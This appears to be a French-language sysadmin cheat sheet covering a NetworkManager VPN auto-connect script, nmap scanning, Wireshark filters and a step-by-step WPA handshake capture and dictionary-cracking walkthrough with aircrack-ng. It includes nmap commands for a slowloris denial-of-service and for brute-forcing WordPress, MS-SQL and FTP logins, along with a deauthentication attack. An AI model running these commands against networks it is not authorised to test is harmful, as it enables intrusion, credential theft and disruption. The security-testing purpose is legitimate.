Pour se faire, il suffit d'ajouter le script ci-dessous à l'emplacement indiqué :
#! /bin/bash REQUIRED_CONNECTION_NAME="<name-of-connection>" VPN_CONNECTION_NAME="<name-of-vpn-connection>" default_conn=$(nmcli con show --active | grep "${REQUIRED_CONNECTION_NAME}") vpn_conn=$(nmcli con show id | grep "${VPN_CONNECTION_NAME}") if [ "${default_conn}" -a ! "${vpn_conn}" ]; then nmcli con up id "${VPN_CONNECTION_NAME}" fi
Il faut ensuite simplement adapter les variables REQUIRED_CONNECTION_NAME et VPN_CONNECTION_NAME, et le tour est joué. Un redémarrage du service NetworkManager, ou un reboot de la machine est nécessaire.
ATTENTION !! ne pas oublier de le rendre exécutable !!
Dans tous les cas, on peut scanner soit un poste avec son ip, soit un réseau avec la forme 192.168.0.0/24.
Pour toutes les commandes ci-dessous on peut aussi faire un export en xml (converti ensuite en html) via la commande suivante :
nmap -sn 192.168.1.0/24 -oX test.xml; xsltproc test.xml -o test.html
nmap -sn 192.168.1.0/24
Scanne toutes les IP en 192.168.1.*
sudo nmap -O 192.168.1.51
nmap -A -T4 192.168.1.13
On ajoute -T4 pour une détection plus rapide (4 Threads)
On peut spécifier un port spécifique avec -p [port]. Sans précision supplémentaire, le port sera scanner sur tous les types de protocole (TCP/UDP/SCTP/IP). On peut sinon spécifier avec les options T: pour TCP, U: pour UDP, S: pour SCTP, ou P: pour IP. On peut aussi les utiliser simultanément, comme ceci :
nmap 192.168.1.0/24 -p U:53,111,137,T:21-25,80,139,8080
Ajouter le commutateur -n
nmap -sV 192.168.1.0/24
nmap -sT 192.168.1.0/24
sudo nmap -sU 192.168.1.0/24
nmap -Pn --script vuln 192.168.1.1
nmap 192.168.1.1 -max-parallelism 800 -Pn --script http-slowloris --script-args http-slowloris.runforever=true
WordPress
nmap -sV --script http-wordpress-brute --script-args 'userdb=users.txt,passdb=passwds.txt,http-wordpress-brute.hostname=domain.com, http-wordpress-brute.threads=3,brute.firstonly=true' 192.168.1.105
MS-SQL
nmap -p 1433 --script ms-sql-brute --script-args userdb=customuser.txt,passdb=custompass.txt 192.168.1.105
FTP
nmap --script ftp-brute -p 21 192.168.1.105
Script standard
nmap -sV --script=http-malware-host 192.168.1.105
Script Google
nmap -p80 --script http-google-malware infectedsite.com
== != <= >= < >
AND | (ip.src==192.168.2.25) && (ip.dst==74.125.236.16) |
---|---|
OR | (ip.src==192.168.2.25)||(ip.dst==192.168.2.25) |
IP Source | ip.src == 192.168.1.10 |
---|---|
IP Destination | ip.dst == 192.168.1.1 |
IP (les deux) | ip.addr == 192.168.1.10 |
getent hosts IP
Cela fonctionne aussi bien en LAN que sur des hosts distants.
sudo iw phy phy0 interface add mon0 type monitor
airodump-ng mon0
sudo iw mon0 del
Attention, ceci est à réaliser uniquement sur votre propre réseau, il est strictement interdit par la loi de le faire sur le réseau de quelqu'un d'autre sans son accord préalable et écrit. Vous êtes responsables de vos actes.
Nous utiliserons la populaire suite aircrack.
Le test de sécurité se déroule en 4 étapes principales : créer l'interface moniteur, cibler le réseau, récupérer le “handshake”, trouver le mot de passe.
sudo airmon-ng # lister les cartes réseau sudo airmon-ng start wlp3s0 # lancer l'interface moniteur sur la carte wlp3s0 -> wlp3s0mon
sudo airodump-ng wlp3s0mon # Lister les points d'accès pour en choisir un sudo airodump-ng --write mon_reseau --bssid 00:11:22:AA:BB:CC -c 1 wlp3s0mon
–write spécifie le fichier pour les données récupérées –bssid spécifie l'adresse mac du réseau cible -c pour spécifier le canal du réseau cible
Dans un autre terminal, une autre fenêtre ou un autre onglet, saisir ceci pour récupérer le handshake. L'information apparaitra dans le airodump lancé précédemment. Cela peut prendre du temps, 10 secondes comme 15min…
sudo aireplay-ng -0 1 -e mon_reseau -a 00:11:22:AA:BB:CC -h 55:66:77:DD:EE:FF wlp3s0
-0 spécifie le type d'attaque (1 pour la des-authentification) -e spécifie le nom du réseau -a l'adresse mac du réseau -h l'adresse mac de la carte réseau utilisée
Pour se faire, nous devons utiliser un dictionnaire. Saisir la commande suivante :
sudo aircrack-ng -a 2 -w /dossier/mon_dico.txt ./mon_reseau.cap
-a type d'attaque (2 pour WPA) -w chemin du dico (wordlist) ./mon_reseau.cap fichier de capture généré par airodump-ng
Cette dernière opération peut prendre des heures, selon la taille du dictionnaire (puisqu'il s'agit d'un brute-force).
Amusez vous bien, et faites pas de bétises ;)